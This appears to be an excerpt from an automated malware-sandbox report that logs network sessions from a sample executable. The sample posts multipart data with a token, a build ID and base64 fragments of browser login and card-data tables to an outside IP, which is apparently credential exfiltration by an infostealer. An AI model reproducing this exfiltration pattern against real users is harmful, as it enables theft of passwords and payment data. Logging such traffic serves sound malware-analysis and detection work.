2025-03-15 07:29:26 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-15 07:29:26 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-15 07:29:28 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 15 Mar 2025 07:29:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49737	95.217.30.53	443	7628	C:\Users\user\Desktop\Cm2GRjWK1C.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-15 07:29:27 UTC	181	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----9zmy5xtj5xbimyusrimo Host: 95.217.30.53 Content-Length: 55081 Connection: Keep-Alive Cache-Control: no-cache
2025-03-15 07:29:27 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 39 7a 6d 79 35 78 74 6a 35 78 62 69 6d 79 75 73 72 69 6d 6f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 30 37 66 64 31 31 37 63 65 35 64 61 37 37 30 30 61 66 64 66 63 37 62 30 39 32 66 37 31 34 30 0d 0a 2d 2d 2d 2d 2d 2d 39 7a 6d 79 35 78 74 6a 35 78 62 69 6d 79 75 73 72 69 6d 6f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 35 34 32 35 62 66 39 31 38 31 65 36 63 31 33 32 61 61 62 39 66 65 39 64 35 64 62 62 30 61 66 0d 0a 2d 2d 2d 2d 2d 2d 39 7a 6d 79 35 78 74 6a 35 78 62 69 6d 79 75 73 72 69 6d 6f 0d 0a 43 6f 6e 74 Data Ascii: ------9zmy5xtj5xbimyusrimoContent-Disposition: form-data; name="token"607fd117ce5da7700afdfc7b092f7140------9zmy5xtj5xbimyusrimoContent-Disposition: form-data; name="build_id"95425bf9181e6c132aab9fe9d5dbb0af------9zmy5xtj5xbimyusrimoCont
2025-03-15 07:29:27 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-15 07:29:27 UTC	16355	OUT	Data Raw: 43 42 4a 54 6c 52 46 52 30 56 53 4c 43 42 7a 61 47 46 79 61 57 35 6e 58 32 35 76 64 47 6c 6d 61 57 4e 68 64 47 6c 76 62 6c 39 6b 61 58 4e 77 62 47 46 35 5a 57 51 67 53 55 35 55 52 55 64 46 55 69 42 4f 54 31 51 67 54 6c 56 4d 54 43 42 45 52 55 5a 42 56 55 78 55 49 44 41 73 49 47 74 6c 65 57 4e 6f 59 57 6c 75 58 32 6c 6b 5a 57 35 30 61 57 5a 70 5a 58 49 67 51 6b 78 50 51 69 77 67 63 32 56 75 5a 47 56 79 58 33 42 79 62 32 5a 70 62 47 56 66 61 57 31 68 5a 32 56 66 64 58 4a 73 49 46 5a 42 55 6b 4e 49 51 56 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b Data Ascii: CBJTlRFR0VSLCBzaGFyaW5nX25vdGlmaWNhdGlvbl9kaXNwbGF5ZWQgSU5URUdFUiBOT1QgTlVMTCBERUZBVUxUIDAsIGtleWNoYWluX2lkZW50aWZpZXIgQkxPQiwgc2VuZGVyX3Byb2ZpbGVfaW1hZ2VfdXJsIFZBUkNIQVIsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3Jk
2025-03-15 07:29:27 UTC	6016	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-15 07:29:28 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 15 Mar 2025 07:29:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-03-15 07:29:28 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49738	95.217.30.53	443	7628	C:\Users\user\Desktop\Cm2GRjWK1C.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-15 07:29:29 UTC	182	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----2vs26f3eua1v3790hvas Host: 95.217.30.53 Content-Length: 186149 Connection: Keep-Alive Cache-Control: no-cache
2025-03-15 07:29:29 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 32 76 73 32 36 66 33 65 75 61 31 76 33 37 39 30 68 76 61 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 30 37 66 64 31 31 37 63 65 35 64 61 37 37 30 30 61 66 64 66 63 37 62 30 39 32 66 37 31 34 30 0d 0a 2d 2d 2d 2d 2d 2d 32 76 73 32 36 66 33 65 75 61 31 76 33 37 39 30 68 76 61 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 35 34 32 35 62 66 39 31 38 31 65 36 63 31 33 32 61 61 62 39 66 65 39 64 35 64 62 62 30 61 66 0d 0a 2d 2d 2d 2d 2d 2d 32 76 73 32 36 66 33 65 75 61 31 76 33 37 39 30 68 76 61 73 0d 0a 43 6f 6e 74 Data Ascii: ------2vs26f3eua1v3790hvasContent-Disposition: form-data; name="token"607fd117ce5da7700afdfc7b092f7140------2vs26f3eua1v3790hvasContent-Disposition: form-data; name="build_id"95425bf9181e6c132aab9fe9d5dbb0af------2vs26f3eua1v3790hvasCont
2025-03-15 07:29:29 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-15 07:29:29 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-15 07:29:29 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-15 07:29:29 UTC	16355	OUT	Data Raw: 66 64 47 56 34 64 43 42 57 51 56 4a 44 53 45 46 53 4c 43 42 31 63 32 46 6e 5a 56 39 70 62 6e 4e 30 63 6e 56 6a 64 47 6c 76 62 6e 4e 66 64 47 56 34 64 43 42 57 51 56 4a 44 53 45 46 53 4b 59 46 30 47 41 63 58 52 55 55 42 67 6d 74 30 59 57 4a 73 5a 58 4e 6c 63 6e 5a 6c 63 6c 39 6a 59 58 4a 6b 58 32 4e 73 62 33 56 6b 58 33 52 76 61 32 56 75 58 32 52 68 64 47 46 7a 5a 58 4a 32 5a 58 4a 66 59 32 46 79 5a 46 39 6a 62 47 39 31 5a 46 39 30 62 32 74 6c 62 6c 39 6b 59 58 52 68 48 45 4e 53 52 55 46 55 52 53 42 55 51 55 4a 4d 52 53 42 7a 5a 58 4a 32 5a 58 4a 66 59 32 46 79 5a 46 39 6a 62 47 39 31 5a 46 39 30 62 32 74 6c 62 6c 39 6b 59 58 52 68 49 43 68 70 5a 43 42 57 51 56 4a 44 53 45 46 53 4c 43 42 7a 64 57 5a 6d 61 58 67 67 56 6b 46 53 51 30 68 42 55 69 77 67 5a 58 Data Ascii: fdGV4dCBWQVJDSEFSLCB1c2FnZV9pbnN0cnVjdGlvbnNfdGV4dCBWQVJDSEFSKYF0GAcXRUUBgmt0YWJsZXNlcnZlcl9jYXJkX2Nsb3VkX3Rva2VuX2RhdGFzZXJ2ZXJfY2FyZF9jbG91ZF90b2tlbl9kYXRhHENSRUFURSBUQUJMRSBzZXJ2ZXJfY2FyZF9jbG91ZF90b2tlbl9kYXRhIChpZCBWQVJDSEFSLCBzdWZmaXggVkFSQ0hBUiwgZX
2025-03-15 07:29:29 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-15 07:29:29 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-15 07:29:29 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-15 07:29:29 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-15 07:29:29 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-15 07:29:31 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 15 Mar 2025 07:29:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49752	142.250.186.68	443	7432	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-15 07:29:32 UTC	593	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEI0qDKAQig4coBCJOhywEInP7MAQiFoM0BCL7VzgEIgNbOAQjI3M4BCIrgzgEIruTOAQiL5c4B Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-15 07:29:33 UTC	1303	IN	HTTP/1.1 200 OK Date: Sat, 15 Mar 2025 07:29:33 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-33GQ3j1donQTCWrGAuX9Ng' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Downlink Accept-CH: RTT Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
